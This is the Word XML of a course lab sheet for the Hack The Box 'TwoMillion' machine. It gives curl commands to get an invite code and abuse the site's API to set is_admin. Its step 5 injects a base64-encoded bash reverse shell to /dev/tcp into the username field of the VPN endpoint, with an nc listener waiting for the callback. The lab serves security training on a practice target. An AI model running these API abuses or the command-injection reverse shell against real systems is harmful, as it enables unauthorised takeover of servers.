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07EF2" w14:textId="0551DC91" w:rsidR="00707377" w:rsidRDefault="00F7155B" w:rsidP="00707377">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>TwoMillion (Escalation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8B7A1D" w14:textId="190F807A" w:rsidR="00F9508F" w:rsidRDefault="009A0B86" w:rsidP="000D0F7D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8AF737" w14:textId="671DB0C0" w:rsidR="001E1D0D" w:rsidRDefault="0002738B" w:rsidP="001E1D0D">
      <w:r>
        <w:t xml:space="preserve">This lab </w:t>
      </w:r>
      <w:r w:rsidR="003512DB">
        <w:t xml:space="preserve">is part 2 </w:t>
      </w:r>
      <w:r w:rsidR="005E37B8">
        <w:t xml:space="preserve">the HTB </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005E37B8">
        <w:t>Twomillion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005E37B8">
        <w:t xml:space="preserve"> lab</w:t>
      </w:r>
      <w:r w:rsidR="00B25AF6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E759FCF" w14:textId="0270C3E0" w:rsidR="006F6E3C" w:rsidRDefault="006F6E3C" w:rsidP="000D0F7D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="000D0F7D">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t>Tools</w:t>
      </w:r>
      <w:r>
        <w:t>/Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521041BD" w14:textId="7DC26258" w:rsidR="0010029F" w:rsidRDefault="002C5B9A" w:rsidP="009A05E3">
      <w:r>
        <w:t>Parrot</w:t>
      </w:r>
      <w:r w:rsidR="00FB2099">
        <w:t xml:space="preserve">: OpenVPN, Curl, </w:t>
      </w:r>
      <w:r w:rsidR="002F5F77">
        <w:t>Browser</w:t>
      </w:r>
      <w:r w:rsidR="000D0F7D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055888F4" w14:textId="746C65F9" w:rsidR="006F6E3C" w:rsidRDefault="006F6E3C" w:rsidP="000D0F7D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B56F14" w14:textId="29928797" w:rsidR="00740EA7" w:rsidRDefault="00740EA7" w:rsidP="00436FCD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Invite code</w:t>
      </w:r>
      <w:r w:rsidR="006C69FF">
        <w:t xml:space="preserve"> shortcut.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D15150" w14:textId="6F7812B3" w:rsidR="00740EA7" w:rsidRDefault="00740EA7" w:rsidP="00C43BAB">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r w:rsidRPr="00740EA7">
        <w:t>curl -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00740EA7">
        <w:t>sX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00740EA7">
        <w:t xml:space="preserve"> POST http://2million.htb/api/v1/invite/generate | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00740EA7">
        <w:t>jq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3E23E685" w14:textId="7F427AAA" w:rsidR="00DB4749" w:rsidRDefault="00DB4749" w:rsidP="00C43BAB">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t># IF the data is encode</w:t>
      </w:r>
      <w:r w:rsidR="000928EC">
        <w:t>d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EF3C53" w14:textId="232A5330" w:rsidR="000928EC" w:rsidRDefault="000928EC" w:rsidP="00C43BAB">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r w:rsidRPr="000928EC">
        <w:t>curl -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000928EC">
        <w:t>sX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000928EC">
        <w:t xml:space="preserve"> POST http://2million.htb/api/v1/invite/generate | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000928EC">
        <w:t>jq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000928EC">
        <w:t xml:space="preserve"> -r .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000928EC">
        <w:t>data.code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000928EC">
        <w:t xml:space="preserve"> | base64 -d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A069835" w14:textId="1CC8BD26" w:rsidR="00F73B7A" w:rsidRDefault="000928EC" w:rsidP="003A7904">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># IF the data is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F73B7A">
        <w:t>enc</w:t>
      </w:r>
      <w:r w:rsidR="00AD6E5C">
        <w:t>type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003A7904">
        <w:t xml:space="preserve"> use </w:t>
      </w:r>
      <w:r w:rsidR="00BF4CB0">
        <w:t>rot13 or the tr command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514D8502" w14:textId="019FE6C7" w:rsidR="0031322F" w:rsidRDefault="0031322F" w:rsidP="0031322F">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r w:rsidRPr="000928EC">
        <w:t>curl -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000928EC">
        <w:t>sX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000928EC">
        <w:t xml:space="preserve"> POST http://2million.htb/api/v1/invite/generate | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000928EC">
        <w:t>jq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000928EC">
        <w:t xml:space="preserve"> -r .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000928EC">
        <w:t>data.</w:t>
      </w:r>
      <w:r w:rsidR="00967225">
        <w:t>data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000928EC">
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CB7489" w14:textId="350AA805" w:rsidR="000928EC" w:rsidRDefault="00732DC3" w:rsidP="00C43BAB">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r w:rsidRPr="00732DC3">
        <w:t>tr 'A-Za-z' 'N-ZA-Mn-za-m'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDCC21D" w14:textId="77777777" w:rsidR="00732DC3" w:rsidRDefault="00732DC3" w:rsidP="00C43BAB">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C59B1BA" w14:textId="235103A4" w:rsidR="009A0066" w:rsidRDefault="00BF4CB0" w:rsidP="00AD612E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Complete the user </w:t>
      </w:r>
      <w:r w:rsidR="009A0066">
        <w:t>registration and grab the PHPSESSID cookie value</w:t>
      </w:r>
      <w:r w:rsidR="0018424E">
        <w:t xml:space="preserve">.  The example user </w:t>
      </w:r>
      <w:r w:rsidR="00F91E8A" w:rsidRPr="00F91E8A">
        <w:t>test@2million.htb</w:t>
      </w:r>
      <w:r w:rsidR="00F91E8A">
        <w:t xml:space="preserve"> is quite often taken.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C1D092" w14:textId="31087412" w:rsidR="00AD612E" w:rsidRDefault="001044BA" w:rsidP="00AD612E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidR="00CA0B91">
        <w:t xml:space="preserve"> manipulation</w:t>
      </w:r>
      <w:r w:rsidR="006C70C7">
        <w:t xml:space="preserve"> (shell commands</w:t>
      </w:r>
      <w:r w:rsidR="00FF4836">
        <w:t xml:space="preserve"> from walkthrough</w:t>
      </w:r>
      <w:r w:rsidR="006C70C7">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B81B6EE" w14:textId="77777777" w:rsidR="006C70C7" w:rsidRDefault="006C70C7" w:rsidP="006C70C7">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t>PHP_COOKIE="PHPSESSID=qgr6gba543dnl1omnab8qv67lf"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163C1CFC" w14:textId="77777777" w:rsidR="002236AF" w:rsidRDefault="002236AF" w:rsidP="006C70C7">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06D3A6A6" w14:textId="77777777" w:rsidR="006C70C7" w:rsidRDefault="006C70C7" w:rsidP="006C70C7">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t>curl -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2million.htb/api --cookie $PHP_COOKIE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00ACCFA7" w14:textId="77777777" w:rsidR="006C70C7" w:rsidRDefault="006C70C7" w:rsidP="006C70C7">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">curl 2million.htb/api/v1 --cookie $PHP_COOKIE | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00A6E6A1" w14:textId="77777777" w:rsidR="006C70C7" w:rsidRDefault="006C70C7" w:rsidP="006C70C7">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">curl http://2million.htb/api/v1/admin/auth --cookie $PHP_COOKIE | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1DEA615E" w14:textId="77777777" w:rsidR="006C70C7" w:rsidRDefault="006C70C7" w:rsidP="006C70C7">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t>curl -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -X POST http://2million.htb/api/v1/admin/vpn/generate --cookie $PHP_COOKIE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A61EF0" w14:textId="77777777" w:rsidR="006C70C7" w:rsidRDefault="006C70C7" w:rsidP="006C70C7">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">curl -v -X PUT http://2million.htb/api/v1/admin/settings/update --cookie $PHP_COOKIE | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="56FDA8D4" w14:textId="77777777" w:rsidR="006C70C7" w:rsidRDefault="006C70C7" w:rsidP="006C70C7">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t>curl -v -X PUT http://2million.htb/api/v1/admin/settings/update --cookie $PHP_COOKIE --header "Content-Type: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">" | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5C42A1AF" w14:textId="77777777" w:rsidR="006C70C7" w:rsidRDefault="006C70C7" w:rsidP="006C70C7">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03419A28" w14:textId="7D65713E" w:rsidR="006C70C7" w:rsidRDefault="006C70C7" w:rsidP="006C70C7">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t>curl -X PUT http://2million.htb/api/v1/admin/settings/update --cookie $PHP_COOKIE --header "Content-Type: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" --data '{"email":"test@</w:t>
      </w:r>
      <w:r w:rsidR="0008062F">
        <w:t>2million.htb</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">"}' | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="06C3B35F" w14:textId="77777777" w:rsidR="006C70C7" w:rsidRDefault="006C70C7" w:rsidP="006C70C7">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CC4F7E4" w14:textId="0A29A3E5" w:rsidR="006C70C7" w:rsidRDefault="006C70C7" w:rsidP="006C70C7">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t>curl -X PUT http://2million.htb/api/v1/admin/settings/update --cookie $PHP_COOKIE --header "Content-Type: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" --data '{"email":"</w:t>
      </w:r>
      <w:r w:rsidR="000814D0">
        <w:t>test@</w:t>
      </w:r>
      <w:r w:rsidR="00504C59">
        <w:t>2million.htb</w:t>
      </w:r>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>is_admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">": 1}' | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4B66AF06" w14:textId="77777777" w:rsidR="006C70C7" w:rsidRDefault="006C70C7" w:rsidP="006C70C7">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D555588" w14:textId="77777777" w:rsidR="006C70C7" w:rsidRDefault="006C70C7" w:rsidP="006C70C7">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">curl http://2million.htb/api/v1/admin/auth --cookie $PHP_COOKIE | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBF0432" w14:textId="77777777" w:rsidR="006C70C7" w:rsidRDefault="006C70C7" w:rsidP="006C70C7">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7410B812" w14:textId="77777777" w:rsidR="006C70C7" w:rsidRDefault="006C70C7" w:rsidP="006C70C7">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t>curl -X POST http://2million.htb/api/v1/admin/vpn/generate --cookie $PHP_COOKIE --header "Content-Type: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" --data '{"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>username":"test</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">"}' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40727670" w14:textId="77777777" w:rsidR="006C70C7" w:rsidRDefault="006C70C7" w:rsidP="006C70C7">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37B4BEF0" w14:textId="216C155E" w:rsidR="00672D18" w:rsidRDefault="00063E84" w:rsidP="00927E93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>NETCAT install</w:t>
      </w:r>
      <w:r w:rsidR="00894E82">
        <w:t xml:space="preserve"> for callback listener</w:t>
      </w:r>
      <w:r w:rsidR="00927E93">
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="00672D18">
        <w:t xml:space="preserve">Parrot doesn’t include </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00672D18">
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00672D18">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00672D18">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00672D18">
        <w:t>) by default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3FC2A8" w14:textId="7C03C54B" w:rsidR="00063E84" w:rsidRDefault="00063E84" w:rsidP="008E1580">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r w:rsidRPr="00063E84">
        <w:t xml:space="preserve">sudo apt-get install -y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00063E84">
        <w:t>netcat-openbsd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5A919527" w14:textId="4107E88A" w:rsidR="004727E0" w:rsidRDefault="00F328CA" w:rsidP="008E1580">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -l 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AA4693" w14:textId="77777777" w:rsidR="008E1580" w:rsidRDefault="008E1580" w:rsidP="008E1580">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B494D05" w14:textId="0F775807" w:rsidR="00242094" w:rsidRDefault="00672D18" w:rsidP="00927E93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Create the command to be remot</w:t>
      </w:r>
      <w:r w:rsidR="00242094">
        <w:t>ely executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3760FA4F" w14:textId="7BBAE0A6" w:rsidR="00F46184" w:rsidRDefault="007C1C2B" w:rsidP="00F46184">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t>YOUR_IP</w:t>
      </w:r>
      <w:r w:rsidR="00F46184">
        <w:t xml:space="preserve">=`sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F46184">
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F46184">
        <w:t xml:space="preserve"> tun0 | grep -e "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F46184">
        <w:t>inet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F46184">
        <w:t xml:space="preserve"> " | tr -s ' ' | cut -d ' ' -f3`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CCF35C" w14:textId="244D34A7" w:rsidR="0069358D" w:rsidRDefault="0069358D" w:rsidP="00F46184">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r w:rsidRPr="0069358D">
        <w:t>echo "bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0069358D">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0069358D">
        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0069358D">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0069358D">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="007C1C2B">
        <w:t>$YOUR_IP</w:t>
      </w:r>
      <w:r w:rsidRPr="0069358D">
        <w:t>/1234 0&gt;&amp;1" | base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1761BCDA" w14:textId="77777777" w:rsidR="0069358D" w:rsidRDefault="0069358D" w:rsidP="007E158B">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44DAFFAE" w14:textId="6BA0EAEF" w:rsidR="007E158B" w:rsidRDefault="007E158B" w:rsidP="007E158B">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t>curl -X POST http://2million.htb/api/v1/admin/vpn/generate --cookie $PHP_COOKIE --header "Content-Type: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" --data '{"username":"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>test;echo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMi8xMjM0IDA+JjEK | base64 -d | bash;"}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2ADBCB" w14:textId="77777777" w:rsidR="00420768" w:rsidRDefault="00420768" w:rsidP="007E158B">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="649E1419" w14:textId="046E6BA5" w:rsidR="00187431" w:rsidRDefault="00D47542" w:rsidP="00995394">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Follow the HTB </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>walkthough</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00717DEF">
        <w:t>.  Starting at the “Lateral Movement” section.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F255E3" w14:textId="212ECBF1" w:rsidR="006F6E3C" w:rsidRDefault="006F6E3C" w:rsidP="004E68E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Su</w:t>
      </w:r>
      <w:r w:rsidR="00EA5F22">
        <w:t>bmission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C410AD4" w14:textId="640CC577" w:rsidR="00DC1B82" w:rsidRDefault="00473D8F" w:rsidP="001E1D0D">
      <w:r>
        <w:t>On Canvas</w:t>
      </w:r>
      <w:r w:rsidR="00247616">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469AD00D" w14:textId="77777777" w:rsidR="008B6C94" w:rsidRDefault="008B6C94" w:rsidP="008B6C94">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Additional Thoughts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD292F4" w14:textId="0BFCDA9A" w:rsidR="00707377" w:rsidRPr="002C42CC" w:rsidRDefault="00116B1A" w:rsidP="008B6C94">
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Not at this time.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00707377" w:rsidRPr="002C42CC" w:rsidSect="003646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712B8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BD667526"/>
    <w:lvl w:ilvl="0" w:tplc="BFBE7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93ACE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="47A031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C73E2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A0B6E9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187671">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1774545567">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="250243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2E"/>
    <w:rsid w:val="000002C9"/>
    <w:rsid w:val="0002738B"/>
    <w:rsid w:val="00031952"/>
    <w:rsid w:val="0004062A"/>
    <w:rsid w:val="00042FB4"/>
    <w:rsid w:val="00063E84"/>
    <w:rsid w:val="0008062F"/>
    <w:rsid w:val="000814D0"/>
    <w:rsid w:val="000928EC"/>
    <w:rsid w:val="000B31CA"/>
    <w:rsid w:val="000C0104"/>
    <w:rsid w:val="000D0F7D"/>
    <w:rsid w:val="0010029F"/>
    <w:rsid w:val="001044BA"/>
    <w:rsid w:val="0011442D"/>
    <w:rsid w:val="00116B1A"/>
    <w:rsid w:val="0018424E"/>
    <w:rsid w:val="00187431"/>
    <w:rsid w:val="001B1538"/>
    <w:rsid w:val="001E1D0D"/>
    <w:rsid w:val="001E557B"/>
    <w:rsid w:val="002155EB"/>
    <w:rsid w:val="002236AF"/>
    <w:rsid w:val="00223EFE"/>
    <w:rsid w:val="00236D9D"/>
    <w:rsid w:val="00242094"/>
    <w:rsid w:val="00247616"/>
    <w:rsid w:val="00271D76"/>
    <w:rsid w:val="0027205A"/>
    <w:rsid w:val="00273901"/>
    <w:rsid w:val="00285E3F"/>
    <w:rsid w:val="002A3CD0"/>
    <w:rsid w:val="002A7FAF"/>
    <w:rsid w:val="002B2368"/>
    <w:rsid w:val="002C21A1"/>
    <w:rsid w:val="002C42CC"/>
    <w:rsid w:val="002C5B9A"/>
    <w:rsid w:val="002F5F77"/>
    <w:rsid w:val="0031322F"/>
    <w:rsid w:val="003238D1"/>
    <w:rsid w:val="00330572"/>
    <w:rsid w:val="003512DB"/>
    <w:rsid w:val="00355CB7"/>
    <w:rsid w:val="003646CF"/>
    <w:rsid w:val="00383F9D"/>
    <w:rsid w:val="0039229C"/>
    <w:rsid w:val="003A1C3C"/>
    <w:rsid w:val="003A7904"/>
    <w:rsid w:val="003B738F"/>
    <w:rsid w:val="00405A2E"/>
    <w:rsid w:val="00420768"/>
    <w:rsid w:val="00420D3F"/>
    <w:rsid w:val="00436FCD"/>
    <w:rsid w:val="004376F5"/>
    <w:rsid w:val="004517FA"/>
    <w:rsid w:val="00454E9F"/>
    <w:rsid w:val="004727E0"/>
    <w:rsid w:val="00473D8F"/>
    <w:rsid w:val="00476873"/>
    <w:rsid w:val="00494ABD"/>
    <w:rsid w:val="004C33E2"/>
    <w:rsid w:val="004C3871"/>
    <w:rsid w:val="004E68E7"/>
    <w:rsid w:val="00504C59"/>
    <w:rsid w:val="0056187F"/>
    <w:rsid w:val="00582C29"/>
    <w:rsid w:val="005D4C88"/>
    <w:rsid w:val="005D6FA8"/>
